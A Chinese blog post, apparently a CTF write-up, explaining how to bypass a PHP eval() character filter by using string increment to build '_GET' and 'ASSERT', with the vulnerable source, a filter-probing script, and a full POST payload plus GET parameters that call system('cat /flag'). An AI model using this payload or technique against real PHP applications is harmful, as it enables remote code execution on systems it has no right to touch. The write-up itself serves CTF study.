PHP自增构造_GET

最新推荐文章于 2024-04-27 02:19:55 发布
最新推荐文章于 2024-04-27 02:19:55 发布
阅读量779 收藏 4
点赞数 1
分类专栏: CTF知识点 文章标签: php servlet 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/126215305
版权

源码:

<?php
error_reporting(0);
if ($_GET['secret']){
    highlight_file(__FILE__);
}else{
    setcookie("hint", "?secret", time()+3600);
}
if (isset($_POST['hh'])) {
    $hh = $_POST['hh'];
    if (is_string($hh) || strlen($hh) <= 107) {
        if (!preg_match("/[!@#%^&*:'\"|`a-zB-Z~\\\\]|[2-5]/",$hh)){
            eval($hh);
        }else{
            echo("no! hacker!!");
        }
    }
} else {

    phpinfo();
}

查看正则匹配还剩的东西:

<?php
for($a = 0; $a < 256; $a++){
    if (!preg_match("/[!@#%^&*:'\"|`a-zB-Z~\\\\]|[2-5]/", chr($a))){
        echo chr($a)." ";
    }
}
?>

只有 1 6 7 8 9 ; < = > ? A [ ] _ { } 可以用了;

然后要触发eval() 构造rce 就可以通过PHP自增来实现;什么是PHP自增?

比如 ‘a’++ =b;'c'++=d;

这就是自增,那么这道题就可以通过A 的自增来得到我们想要的函数

另外,在php中,当把字符串和数组连接在一起时,最终返回的值是Array

<?php
echo ''.[];

//输出 Array

那么只要取Array中的第一个字母A和第四个字母a,就可以得到A-Z和a-z的所有字母组合。

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]);  // ASSERT($_POST[_]);

这里我们采用A来构造_GET

<?php
$_='A';
$_++;
$_++;
$_++;
$A=++$_;
$_++;
$A_=++$_;

$_=('A'/'A'.'A'){0}; //N
$_++; //O
$_++; //P
$_++; //Q
$_++; //R
$_++; //S
$_='_'.$A_.$A.++$_; //_GET
echo $_;
//($$_{1})($$_{2}); //($_GET{1})($_GET{2})

post传参

hh=$_=A;$_++;$_++;$_++;$A=++$_;$_++;$A_=++$_;$_=(A/A.A){0};$_++;$_++;$_++;$_++;$_++;$_=_.$A_.$A.++$_;($$_{6})($$_{7});

 但是要经过URL编码传参;

然后get传

secret=6&6=system&7=cat /flag

和system相同的还有passthru

一只Traveler
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php 使用file_get_contents读取大文件的方法
10-25
本文介绍了在php中使用file_get_contents函数读取大文件的方法,并附上了示例以及使用小技巧,非常的实用,这里推荐给大家
PHP中使用file_get_contents post数据代码例子
10-24
主要介绍了PHP中使用file_get_contents post数据代码例子,本文直接给出代码实例,需要的朋友可以参考下
RCE漏洞简介
永远是少年
12-10 5334
今天继续给大家介绍渗透测试相关知识,本文主要内容是RCE漏洞简介。 一、RCE漏洞简介与危害 二、代码执行和命令执行区别 三、RCE漏洞产生与防护
无字母数字rce总结(自、取反、异或、或、临时文件上传)
whale_waves的博客
02-29 1479
临时文件上传 通过上传文件然后用符号.调用执行文件 第一个知识点: 通过post上传文件,此时php会在linux里的零时文件夹保存文件,且文件一定是php加上六个随机的字符 /tmp/php?????? 这个应php保存的临时文件会有一个特性,就是这6个随机的字符会出现大写的情况 例如: 普通文件/tmp/adcabcabc php保存的临时文件/tmp/phpAvxAsa 第二个知识点: 现在直到了文件上传的位置以及特性那么现在要怎么利用它 shell下支持使用. 来
无字母RCE--自绕过
最新发布
qq_75120258的博客
04-27 343
(Increment)通常指的是将某个值加一个固定的量。在编程中,自通常用于循环计数、迭代或者更新变量的值等情况。 在许多编程语言中,自操作可以通过使用 ++ 符号来完成。例如,在C语言中,++ 操作符可以用于将变量的值加1。
mysql 自前缀_PHP中的前缀自(++i) 和后缀自 (i++) | 学步园
weixin_36448205的博客
02-02 255
转载自:http://www.phppan.com/2011/05/pre_inc-and-post_inc-in-php/当我们学第一门语言时,比如大学课程中的C语言程序设计,也许曾经被前缀自(++i) 和后缀自 (i++)纠结过。 曾经以为我们懂了:i++ :先引用后加,先在i所在的表达式中使用i的当前值,后让i加1++i :先加后引用,让i先加1,然后在i所在的表达式中使用i的新值这...
php中的自和自减操作
BianHuanShiZhe的专栏
06-13 3145
&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-cn"&gt;&lt
phpRedis函数使用总结【分类详细】
weixin_55297198的博客
03-15 91
测试环境: PHP:5.5 Redis:2.4.6参考网址: https://github.com/phpredis/phpredis参考网址: http://www.cnblogs.com/zcy_soft/archive/2012/09/21/2697006.html Redis 五种数据类型的使用场景 : http://blog.csdn.net/gaogaoshan/article/details/41039581
php file_get_contents取文件中数组元素的方法
10-20
下面小编就为大家带来一篇php file_get_contents取文件中数组元素的方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
PHP file_get_contents设置超时处理方法
10-26
今天说的这篇是讲超时的,确实在跨服务器提交的时候,不可避免的会遇到超时的情况,这个时候怎么办?set_time_limit是没有用的,只有用context中的timeout时间来控制
PHP使用fopen与file_get_contents读取文件实例分享
10-22
主要介绍了PHP使用fopen与file_get_contents读取文件实例分享的相关资料,需要的朋友可以参考下
PHP 的 uniqid 函数产生的 id 真的是唯一的么?
m0_37477061的博客
03-12 299
https://www.cnblogs.com/yjf512/p/9057229.html
php每日自动加成长值,【函数分享】每日PHP函数分享(2021-1-19)
weixin_39968655的博客
03-20 180
substr 函数返回字符串的一部分。注释:如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。string substr (string $string , int $start [, int $length ])参数描述string输入字符串。start如果 start 是非负数,返回的字符串将从 string 的 start 位置开始,从 0 开始...
php数值怎么自,PHP实现ID自并指定位数
weixin_36146690的博客
03-11 583
这篇文章介绍的内容是关于 PHP实现ID自并指定位数,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下在开发的过程中常常遇到这样折需求:ID值为自,长度为7位。不够前面用0补齐。具休实现:mysqlid char(7) not null default '0000000';php设置公共的方法/** * @param $id * @return string|void */prot...
php
welcome to daijiguo's blog
10-03 2892
phpmyadmin设置表时,一定要设置一个自长的字段,不然会提示Current selection does not contain a unique column. Grid edit, checkbox, Edit, Copy and Delete features are not available.
php中关于自的运算,PHP 中「自、自减」运算引发的奇怪问题
weixin_33695631的博客
03-12 132
$a = TRUE;var_dump(--$a); // bool(true)$b = FALSE;var_dump(++$b); // bool(false)$b = FALSE;var_dump(--$b); // bool(false)递/递减 NULL :php$a = NULL;var_dump(++$a); // int(1)$a = NULL;var_dump(--$a); // ...
php $_get用法
05-31
`$_GET` 是一个 PHP 超全局变量,用于获取通过 URL 传递的参数。当我们使用 GET 方法提交表单或者点击链接时,参数会被追加到 URL 的末尾,例如 `http://example.com?name=John&age=25`。这时,`$_GET['name']` 就可以获取到 'John',`$_GET['age']` 就可以获取到 25。 下面是一个简单的例子,演示如何使用 `$_GET` 获取 URL 参数: ```php <?php if (isset($_GET['name']) && isset($_GET['age'])) { $name = $_GET['name']; $age = $_GET['age']; echo "Your name is {$name}, and you are {$age} years old."; } ?> ``` 在上面的例子中,我们首先使用 `isset()` 函数判断 URL 中是否存在 `name` 和 `age` 参数。如果存在,我们使用 `$_GET` 获取这两个参数的值,并输出到页面上。注意,当我们使用 `$_GET` 获取参数时,需要进行安全过滤,以避免 SQL 注入等安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值